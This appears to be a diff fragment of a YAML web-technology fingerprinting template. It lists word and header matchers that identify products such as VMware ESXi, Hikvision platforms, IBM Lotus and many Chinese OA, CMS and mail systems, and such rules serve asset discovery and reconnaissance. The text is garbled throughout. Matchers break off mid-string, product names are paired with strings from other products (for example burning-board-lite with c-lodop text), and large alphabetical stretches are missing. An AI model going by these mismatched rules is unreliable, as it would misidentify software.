bentley-systems-projectwise + words: + - href="projectwise.ico + + - type: word + name: bestsch-ecs + words: + - /userfiles/admin/customskin + + - type: word + name: bestsch-ecs + words: + - src="/include/ecsserverapi.js + + - type: word + name: betasoft-pdm-data-acquisition + words: + - align="center" class="login_pdm"> + + - type: word + name: betasoft-pdm-data-acquisition + words: + - "background: no-repeat url(../images/login/pdmdenglu1_28.png);" + + - type: word + name: beyeon-iot + words: + - 版权所有:郑州蓝视科技有限公司 + + - type: word + name: beyeon-iot + words: + - var app_smp_type_name = '门店';var app_grp_type_name = '集团' + + - type: word + name: bh-bh5000c + words: + - bhclientcer:"/modules/web/common/data/bhclient.cer + + - type: word + name: bicesoft-super-custom-survey-voting-system + words: + - href="images/bicesoft.css" + + - type: word + name: bicesoft-super-custom-survey-voting-system + words: + - 佰思超强自定义问卷调查系统(bicesoft.com) + + - type: word + name: biept-system + words: + - class="loginin loginin1" + + - type: word + name: bigdump + words: + - "bigdump: staggered mysql dump importer" + + - type: word + name: billingtesttool + words: + - href:'/billtool/querysum' + + - type: word + name: bio-lims + words: + - /lims/dist/css/font-awesome.min.css + + - type: word + name: biscom-delivery-server + words: + - /bds/stylesheets/fds.css + + - type: word + name: biscom-delivery-server + words: + - /bds/includes/fdsjavascript.do + + - type: word + condition: and + name: bit-service + words: + - bit-xxzs + - xmlpzs/webissue.asp + + - type: word + name: bitbucket + words: + - bitbucket.page.login + + - type: word + name: bithighway-product + words: + - href='http://www.bithighway.com' target=_blank>北京碧海威科技有限公司< + + - type: word + part: header + name: bitkeeper + words: + - "Server: bkhttp" + + - type: word + name: bitnami-redmine-stack + words: + - alt="bitnami redmine stack + + - type: word + name: bitrix-site-manager + words: + - bitrix_sm_time_zone + + - type: word + name: bitrix-site-manager + words: + - bx.setcsslist + + - type: word + name: bjca + words: + - <li><a href="/install/certapp_bd.exe">下载证书应用环境</a></li> + + - type: word + name: bjqit-crm + words: + - href=/css/ordercomplaint + + - type: word + part: header + name: blackjumbodog + words: + - "Server: blackjumbodog" + + - type: word + part: header + name: blazix + words: + - "Server: blazix java server" + + - type: word + name: blogenginenet + words: + - pics/blogengine.ico + + - type: word + name: blogenginenet + words: + - http://www.dotnetblogengine.net + + - type: word + name: blogger + words: + - content='blogger + + - type: word + name: blogger + words: + - powered by blogger + + - type: word + name: blueonyx + words: + - thank you for using the blueonyx + + - type: word + name: bluepacific-network-monitoring-system + words: + - /biradarserver/web/ + + - type: word + name: bluepacific-share-content-management-system + words: + - /visadmin/viscms/index.do + + - type: word + name: bluequartz + words: + - value="copyright (c) 2000, cobalt networks + + - type: word + name: boastmachine + words: + - powered by boastmachine + + - type: word + name: boastmachine + words: + - powered by <a href="http://boastology.com + + - type: word + name: bossmail + words: + - <span class="footer_t">powered by bossmail</span> + + - type: word + name: bossmail + words: + - href="http://apps.microsoft.com/windows/zh-cn/app/bossmail/24f4bdb3-1bca-467e-9dd9-15a5d278aec6 + + - type: word + name: bowen-providence-car-loading-reservation-system + words: + - /public/base/js/plugins/crypto/rsa.js + + - type: word + name: boxiao-system + words: + - var bxnstaticresroot='/bxn-static-resource/resources' + + - type: word + name: brewblogger + words: + - developed by <a href="http://www.zkdigital.com + + - type: word + name: bridge5asia-amss + words: + - "education area management support system : amss++" + + - type: word + name: bridge5asia-amss + words: + - /statics/js/mdo-angular-cryptography.js + + - type: word + name: broadcom-ca-pam + words: + - ispamclient = false + + - type: word + name: broadcom-ca-pam + words: + - /cspm/cleansession.jsp + + - type: word + name: brocade-data-angle-guard-database + words: + - window.location.host + "/agweb" + + - type: word + name: brocade-network-advisor + words: + - <span class="ui-menuitem-text">about network advisor</span></a> + + - type: word + name: browsercms + words: + - powered by browsercms + + - type: word + name: browsercms + words: + - content="browsercms + + - type: word + name: bugfree + words: + - id="logo" alt=bugfree + + - type: word + name: bugfree + words: + - class="loginbgimage" alt="bugfree + + - type: word + name: bugzilla + words: + - enter_bug.cgi + + - type: word + name: bugzilla + words: + - /cgi-bin/bugzilla/ + + - type: word + name: bulletlink-newspaper-template + words: + - /modalpopup/core-modalpopup.css + + - type: word + name: bulletlink-newspaper-template + words: + - powered by bulletlink + + - type: word + name: bullwark + words: + - <title>Bullwark Momentum Series + + - type: word + name: burning-board-lite + words: + - powered by 关于c-lodop免费和注册授权

+ + - type: word + name: c-lodop + words: + - document.getelementbyid("reqid").value==document.getelementbyid("licid").value + + - type: word + name: ca-siteminder + words: + - + + - type: word + name: edusoho-open-source-web-classroom- + words: + - powered by edusoho + + - type: word + name: efront + words: + - Elastic HD Dashboard + + - type: word + name: elasticsearch + words: + - ' "tagline" : "You Know, for Search"' + + - type: word + name: elite_cms + words: + - copyright © 2003 - 2017 empirebak + + - type: word + name: empirebak + words: + -
(查看帝国备份王说明文档)
+ + - type: word + name: enigma2 + words: + - href="/web/movielist.rss?tag + + - type: word + name: entercrm + words: + - entercrm + + - type: word + name: enterpriseloginmanagementsystem + words: + - txtusername").focus(); //默认焦点 + + - type: word + name: enterpriseloginmanagementsystem + words: + - themes/scripts/functionjs.js + + - type: word + name: entrance-guard-system + words: + - /media/images/zkeco16.ico + + - type: word + name: episerver + words: + - content="episerver + + - type: word + name: episerver + words: + - /javascript/episerverscriptmanager.js + + - type: word + name: epiware + words: + - epiware - project and document management + + - type: word + name: eqmail + words: + - href="eqmail.ico + + - type: word + name: eqmail + words: + - etcd viewer + + - type: word + part: header + name: ethproxy + words: + - "Server: ethproxy" + + - type: word + name: eticket + words: + - powered by eticket + + - type: word + name: eticket + words: + - + + - type: word + name: eticket + words: + - /eticket/eticket.css + + - type: word + name: etl + words: + -
登录补天etl系统
+ + - type: word + name: euesoft-hr + words: + - link.description = "亿华软件" + + - type: word + name: eureka-server + words: + - eureka/css/wro.css + + - type: word + name: eusestudy + words: + - userinfo/userfp.aspx + + - type: word + name: evercookie + words: + - evercookie.js + + - type: word + name: evercookie + words: + - var ec = new evercookie(); + + - type: word + name: everything + words: + - everything.gif + + - type: word + name: everything + words: + - everything.png + + - type: word + name: ewebeditor + words: + - /ewebeditor.htm? + + - type: word + condition: and + name: ewebs + words: + - ClientDownload.xgi + - NewSoft + + - type: word + name: ewebs + words: + - /js/xajax05/xajax_js/xajax_core.js + + - type: word + name: ewebs + words: + - + + - type: word + name: ewei-plagform + words: + - 易维平台
+ + - type: word + name: examstar + words: + - /examstar_icon.ico + + - type: word + name: examstar + words: + -
考试星为您提供方便、高效的考试服务
+ + - type: word + name: exponent-cms + words: + - content="exponent content management system + + - type: word + name: exponent-cms + words: + - powered by exponent cms + + - type: word + condition: and + name: extmail + words: + - setcookie('extmail_username + - 欢迎使用extmail + + - type: word + name: extplorer + words: + - /extplorer.ico + + - type: word + name: eyou-anti-spam-mailbox-firewall + words: + - content="亿邮大容量电子邮件系统,反垃圾邮件网关 + + - type: word + name: eyou-mail-system + words: + - content="亿邮电子邮件系统 + + - type: word + name: eyou-mail-system + words: + - /tpl/login/user/images/dbg.png + + - type: word + name: eyou-mail-system + words: + - var loginssl = document.form_login.login_ssl.value; + + - type: word + name: eyoucms + words: + - powered by eyoucms + + - type: word + name: eyoucms + words: + - name="generator" content="eyoucms + + - type: word + part: header + name: ez-publish + words: + - "Set-Cookie: ezsessioncookie" + + - type: word + part: header + name: ezoffice + words: + - "Location: /defaultroot/portal.jsp?access=oa" + + - type: word + name: f5-big-ip + words: + - content="F5 Networks, Inc." + + - type: word + name: f5-bigip + words: + - content="f5 networks, inc. + + - type: word + name: facemeeting-meeting + words: + - class="subnav">飞视美 + + - type: word + name: falcon + words: + -

opsplatform

+ + - type: word + name: falcon + words: + - textarea class="form-control endpoints + + - type: word + name: falipu-iot + words: + - id="t1">安全、稳定、安全 + + - type: word + condition: and + name: fangmail + words: + - /fangmail/cgi/index.cgi + - /fangmail/default/css/em_css.css + + - type: word + name: fangpage-exam + words: + - href="http://fpexam.fangpage.com" target= + + - type: word + name: fangpage-exam + words: + - /sites/exam/statics/css/login.css + + - type: word + name: fanpusoft-construction-work-oa + words: + - /dwr/interface/loginservice.js + + - type: word + name: fanwe + words: + - app/tpl/fanwe_1/images/lazy_loading.gif + + - type: word + name: fanwe + words: + - index.php?ctl=article_cate + + - type: word + name: faq-manager + words: + -  

faq admin area + + - type: word + name: faq-manager + words: + - admin area + + - type: word + name: faqrobot + words: + - content="faq客服机器人 + + - type: word + name: faqrobot + words: + - 南京云问网络技术有限公司 + + - type: word + name: fastadmin-framework + words: + - copyright © fastadmin.net + + - type: word + name: fastadmin-framework + words: + - fastadmin + + - type: word + name: fastadmin-framework + words: + - fastadmin.net + + - type: word + condition: and + name: fastadmin-framework + words: + - FastAdmin + - fastadmin.net + + - type: word + name: fe-oa + words: + - js39/flyrise.stopbackspace.js + + - type: word + name: feifeicms + words: + - data-target="#navbar-feifeicms" + + - type: word + name: femr + words: + - /res/vendor/bootstrap-3.3.5/css/bootstrap.min.css + + - type: word + name: femr + words: + - /res/images/login-bg-1.png + + - type: word + name: fengyunqifei-firim + words: + - href="android/com.apsp.xnmdm-signed.apk" + + - type: word + name: festos + words: + - title="festos + + - type: word + name: festos + words: + - css/festos.css + + - type: word + part: header + name: fex + words: + - "Server: fexsrv" + + - type: word + name: fex + words: + - href="mailto:fexmaster@ostc.de + + - type: word + name: ffay-lanproxy + words: + - '"/lanproxy-config/"' + + - type: word + name: fidion-cms + words: + - + + - type: word + name: hikvision-ivms + words: + -

安防综合管理平台

+ + - type: word + name: hikvision-ivms + words: + - 杭州海康威视系统技术有限公司 版权所有 + + - type: word + name: hikvision-ivms + words: + - serviceip + + - type: word + name: hikvision-ivms-8700 + words: + - src="/portal/common/js/commonvar.js + + - type: word + name: hikvision-v23-control + words: + - hikvision v2.3控件网页demo + + - type: word + name: hikvision-v23-control + words: + - 杭州海康威视数字技术股份有限公司 + + - type: word + name: hikvision-v23-control + words: + - if(m_bdvrcontrol.stoptalk()) + + - type: word + part: header + name: hikvision-videocload + words: + - "Server: face-webs" + + - type: word + name: hillstone-hsa + words: + - href="resources/login-all.css" + + - type: word + name: hillstone-stoneos + words: + - "'hillstone stoneos software version " + + - type: word + condition: and + name: hims-hotel-cloud-computing-service + words: + - gb_root_dir + - maincontent.css + + - type: word + name: hims-hotel-cloud-computing-service + words: + - hims酒店云计算服务 + + - type: word + name: hintsoft-pubwin2015 + words: + - images/newlogin_01.jpg + + - type: word + condition: and + name: hisense-business-management-platform + words: + - src="left.jpg" + - src="up.jpg" + + - type: word + name: hisense-webpos + words: + - webpos登录 + + - type: word + name: hisense-webpos + words: + - content/images/hisense.bmp + + - type: word + name: hispider-router + words: + - action="login.pl" method="post" onsubmit="encryptpasswd() + + - type: word + name: hitachi-maintenance-utility + words: + - __gwt_historyframe + + - type: word + name: hitachi-virtual-storage-platform + words: + - src="/cgismryset/smryset.cgi/clk" + + - type: word + name: hivemail + words: + - content="hivemail + + - type: word + name: hjsoft-hcm + words: + - src="/images/hcm/copyright.gif" + + - type: word + name: hjsoft-hcm + words: + - src="/images/hcm/themes/default/login/login_banner2.png?v=12334" + + - type: word + name: hjsoft-hcm + words: + - src="/general/sys/hjaxmanage.js" + + - type: word + name: hnjycy + words: + - href="http://www.hnjycy.com" target="_blank">沃科网< + + - type: word + name: hollysys-mes + words: + - resource="title_sub" + + - type: word + name: honeypot + words: + -

blog comments

+ + - type: word + name: honeywell-intermec-easylan + words: + - color="black" size="5">intermec easylan + + - type: word + name: hoperun-hr + words: + - 考核评测系统 + + - type: word + name: horde + words: + - _setHordeTitle + + - type: word + name: horde + words: + - "imp: copyright 2001-2009 the horde project" + + - type: word + name: hortonworks-smartsense-tool + words: + - name="hstapp/config/environment" + + - type: word + name: hospital-material-supplier-b2b-platform + words: + - 医院物资供应商b2b平台 + + - type: word + name: host-security-and-management-system + words: + - href=./static/css/app.edb681c84a53277f9336fc297ebca96e.css + + - type: word + name: hostbill + words: + - powered by + + - type: word + condition: and + name: ibm-http-server + words: + - IBM HTTP Server + - Support + + - type: word + name: ibm-imm + words: + - + + - type: word + name: ibm-imm + words: + - ibm.stg.inlinemessage.messagetypes.msg_critical + + - type: word + name: ibm-imm + words: + - /ibmdojo/ + + - type: word + name: ibm-lotus + words: + - action="/names.nsf?login" name="_dominoform + + - type: word + name: ibm-lotus + words: + - 软标科技 + + - type: word + condition: and + name: ibm-lotus + words: + - domcfg.nsf + - login.nsf + + - type: word + condition: and + name: ibm-lotus + words: + - esoaisapp/login.jsp + - main.nsf + + - type: word + part: header + name: ibm-lotus-domino + words: + - "Server: lotus-domino/" + + - type: word + name: ibm-lotus-inotes + words: + - alt="lotus inotes login screen + + - type: word + name: ibm-lotus-sametime + words: + - src="sametime/avtest.js" + + - type: word + name: ibm-lotus-sametime + words: + - href="sametime/meetingcenter-moz.css" + + - type: word + name: ibm-lotus-sametime + words: + - class="sametimemeetingsbuttontransparent" + + - type: word + name: ibm-lotus-sametime + words: + - sametime/themes/images/blank.gif + + - type: word + name: ibm-merge-pacs + words: + - + + - type: word + name: ibm-spectrum-computing + words: + - /platform/framework/logout/logout.action + + - type: word + name: ibm-spectrum-computing + words: + - ssoclient_ + + - type: word + name: ibm-tivoli + words: + - banner/tivoli/tv_icbanner.html + + - type: word + name: ibm-tivoli + words: + - tivoli netview uses an open source web server + + - type: word + name: ibm-tivoli-access-manager + words: + - + + - type: word + name: ibm-tivoli-access-manager + words: + - var warningstring = "warning: to maintain your login session, make sure + that your browser is configured to accept cookies."; + + - type: word + name: ibm-ts3310 + words: + - http-equiv="refresh" content="0; url=/main_login.htm" + + - type: word + part: header + name: ibm-watchfire + words: + - "Set-Cookie: watchfiresessionid" + + - type: word + name: ibm-web-traffic-express-caching-proxy + words: + - /admin-bin/webexec/wte.html + + - type: word + part: header + name: ibm-webseal + words: + - "Server: webseal" + + - type: word + name: ibm-websphere + words: + - websphere + + - type: word + name: ibm-websphere + words: + - com.ibm.websphere.ihs.doc + + - type: word + name: ibm-websphere + words: + - content="websphere application server + + - type: word + name: ibm_openadmin_tool + words: + - class="oat oneui" + + - type: word + name: ibot-cloud + words: + - author:lvzhaohua + + - type: word + name: icall-cms + words: + - var img_obj = document.getelementbyid('showing'); + + - type: word + name: icbc-gyj + words: + - var s3_app_address="https://gyj.icbc.com.cn" + + - type: word + name: idcos-cloudboot + words: + - /clipboard/zeroclipboard.min + + - type: word + part: header + name: ideawebserver + words: + - "Server: ideawebserver" + + - type: word + name: ieslab-scada + words: + - copyrightpt12 + + - type: word + name: ieslab-scada + words: + - 青岛积成电子有限公司 + + - type: word + condition: and + name: igenus-webmail + words: + - href="http://www.igenus.org/" target="_blank"> + - igenus webmail system + + - type: word + name: iguard-security-system + words: + - content="lucky-tech iguard + + - type: word + name: ikonboard + words: + - content="ikonboard + + - type: word + name: ikonboard + words: + - powered by we're sorry but ikuai cloud platform doesn't " + + - type: word + name: ilas + words: + - + + - type: word + name: veritas-netbackup + words: + - href="/opscenter/features/common/images/favicon.ico" + + - type: word + name: vertiv-system + words: + - var port = "9528 + + - type: word + part: header + name: vertx + words: + - "Set-Cookie: vertx-web.session" + + - type: word + name: vhsoft-vhplot + words: + - /vhplot/webresource.axd + + - type: word + name: vicidial + words: + - url=/vicidial/welcome.php + + - type: word + name: victorysoft + words: + - value="style2012/style1/scripts/expressinstall.swf" + + - type: word + name: victorysoft + words: + - href="webstyles/webstyle1/style1/css.css" + + - type: word + name: victorysoft-performance-management-system + words: + - class="row fl-controls-left + + - type: word + name: victorysoft-performance-management-system + words: + - casui/themes/siam/login.css + + - type: word + name: videosoon + words: + - power by linksoon - videosoon + + - type: word + name: videosoon + words: + - href="skin/anysoondefault/anystyles.css + + - type: word + name: videosurveillancemanagementplatform + words: + - " 平台采用最新图像化展现技术" + + - type: word + name: viewgood-streammedia + words: + - fgetquery + + - type: word + name: viewgood-streammedia + words: + - viewgood + + - type: word + condition: and + name: viewgood-streammedia + words: + - location.href + - var webvirtualdiretory = 'viewgood'; + + - type: word + name: viewgood-streammedia + words: + - src='/viewgood/pc/ + + - type: word + name: violation-outreach-monitoring-system + words: + - + + - type: word + name: violation-outreach-monitoring-system + words: + - window.location='login.action'; + + - type: word + name: violation-outreach-monitoring-system + words: + - 欢迎登录违规外联平台 + + - type: word + name: virtualmin + words: + -
forgot your virtualmin password?
+ + - type: word + name: visualware-myconnection-server + words: + - + + - type: word + name: vmedia-multimedia-publishing-platform + words: + - function toggle(targetid) + + - type: word + name: vmedia-multimedia-publishing-platform + words: + - class="video_00" + + - type: word + name: vmware-esx + words: + - content="vmware esxi + + - type: word + name: vmware-esx + words: + - document.write("" + id_eesx_welcome + ""); + + - type: word + name: vmware-esx + words: + - + + - type: word + name: vmware-esx + words: + - 'content="vmware esx ' + + - type: word + name: vmware-esx + words: + - document.write(id_esx_viclientdesc); + + - type: word + name: vmware-esxi + words: + - ng-app="esxuiapp" + + - type: word + name: vmware-esxi + words: + - + + - type: word + name: vmware-horizon + words: + - href='https://www.vmware.com/go/viewclients' + + - type: word + name: vmware-horizon + words: + - alt="vmware horizon"> + + - type: word + name: vmware-server-2 + words: + - content="vmware server is virtual + + - type: word + name: vmware-vcenter + words: + - /converter/vmware-converter-client.exe + + - type: word + name: vmware-vcenter + words: + - content="vmware vcenter + + - type: word + name: vmware-vcenter + words: + - /vmw_nsx_logo-black-triangle-500w.png + + - type: word + name: vmware-virtualcenter + words: + - content="vmware virtualcenter + + - type: word + name: vmware-virtualcenter + words: + - content="vmware vsphere + + - type: word + name: vmware-virtualcenter + words: + - url=vcops-vsphere/ + + - type: word + name: vmware-virtualcenter + words: + - the vshield manager requires + + - type: word + name: vmware-vrealize + words: + - 正在重定向到 vrealize operations manager web + + - type: word + condition: and + name: vmware-vrealize-operations-manager + words: + - Identity Manager + - VMware + + - type: word + name: vmware-vsphere + words: + - <meta name="description" content="VMware vSphere + + - type: word + name: vmwareview + words: + - <title>VMware View Portal + + - type: word + name: vnc + words: + - 微信数字投票 + - content="微平台投票管理系统 + + - type: word + name: vp-asp + words: + - + + - type: word + name: vp-asp + words: + - src="vs350.js + + - type: word + name: vp-asp + words: + - shopdisplayproducts.asp?id= + + - type: word + name: vpn358system + words: + - class="form-actions j_add_ip_actions" + + - type: word + name: vpn358system + words: + - href="/lib/bootstrap/ico/favicon.ico" + + - type: word + name: vrv-desktop-application-system + words: + - vrv + + - type: word + name: vrv-desktop-application-system + words: + - var vver = $('#hidverify').val(); + + - type: word + name: vrv-im + words: + -

连豆豆pc客户端

+ + - type: word + name: vrv-im + words: + - href="http://im.vrv.cn/server-securitycenter/password/goretrieval.vrv + + - type: word + name: vrv-im + words: + - class="loginusername" value="" placeholder="连豆豆账号/邮箱/手机号 + + - type: word + name: vrv-im + words: + - class="wj-text wj-title">下载信源豆豆

+ + - type: word + name: vrv-nac + words: + - id="modal_delay" + + - type: word + condition: and + name: vrv-nac + words: + - localstorage.setitem('doctitle','北信源网络接入控制系统') + - 欢迎登录北信源网络接入控制系统 + + - type: word + name: vts-cms + words: + - errmag + + - type: word + name: w3-total-cache + words: + - " + + - type: word + condition: and + name: websvn + words: + - WebSVN + - subversion + + - type: word + name: webtrust-cert + words: + - https://cert.webtrust.org/viewseal + + - type: word + name: weiphp + words: + - 本系统由weiphp强力驱动 + + - type: word + name: weiphp + words: + - content="weiphp + + - type: word + name: weiphp + words: + - /css/weiphp.css + + - type: word + name: weisha-learningsystem + words: + - /utility/corescripts/widget.js + + - type: word + name: wellcare-health-management-system + words: + - href="/web/vfyphrmedical">健康档案 + + - type: word + name: wellcare-health-management-system + words: + - www.wellcare.cn + + - type: word + part: header + name: weonlydo-product + words: + - "Server: weonlydo" + + - type: word + part: header + name: westell-secure + words: + - "Server: wstl cpe" + + - type: word + name: whatweb + words: + -
+ + - type: word + name: whatweb + words: + - network card access password: + + - type: word + name: whfst-cms + words: + - 武汉富思特 + + - type: word + name: whir + words: + - css/css_whir.css + + - type: word + name: whir-ezoffice + words: + - ezofficeusername + + - type: word + name: whir-ezoffice + words: + - whirrootpath + + - type: word + name: whir-ezoffice + words: + - /defaultroot/js/cookie.js + + - type: word + name: whir-flexoffice + words: + - var flexofficepath="\/flexoffice" + + - type: word + name: whmcs + words: + - powered by please login + or register + + - type: word + name: whtzjkj-erp + words: + - href="/content/home/tzjlog.ico" + + - type: word + name: wildfly-server + words: + - wildfly project + + - type: word + name: willfar-interface-management-tool + words: + - the wasion software foundation + + - type: word + name: willfar-interface-management-tool + words: + - alt="接口应用管理工具" + + - type: word + name: windows-business-server + words: + - src="images/sbslogo.gif + + - type: word + name: windows-business-server + words: + - href="/remote">remote web workplace + + - type: word + part: header + name: windriver + words: + - "Server: windriver-webserver" + + - type: word + part: header + name: wing-ftp-server + words: + - "Server: wing ftp server" + + - type: word + name: winiis-isp-access-resource-management-system + words: + - winisp.gif + + - type: word + name: winmail-server + words: + - amax information technologies inc. + + - type: word + name: winmail-server + words: + - "pop3,smtp server: " + + - type: word + name: winmail-server + words: + - src="themes/default/images/mail_pic.jpg + + - type: word + condition: and + name: winmail-server + words: + - encryptpwd + - sessid + + - type: word + condition: and + name: winmail-server + words: + - f_theme + - pwdplaceholder + + - type: word + name: winmail-server + words: + - winmail mail server + + - type: word + condition: and + name: winmail-server + words: + - "(build " + - background="customer/winmail_bg11.jpg + + - type: word + name: winmail-server + words: + - src="customer/index_winmail_new.gif + + - type: word + name: winwebmail + words: + - winwebmail server + + - type: word + name: winwebmail + words: + - images/owin.css + + - type: word + name: winwebmail + words: + - + + - type: word + name: winwebmail + words: + - type="hidden" name="secex" + + - type: word + name: winwebmail + words: + - href="images\hwem.css" + + - type: word + name: wireless-access-point-controller + words: + - var oemproductname = "mvc_howay6000" + + - type: word + name: wireless-access-point-controller + words: + -
troy + serial server
邮局管理员可自行分配邮箱!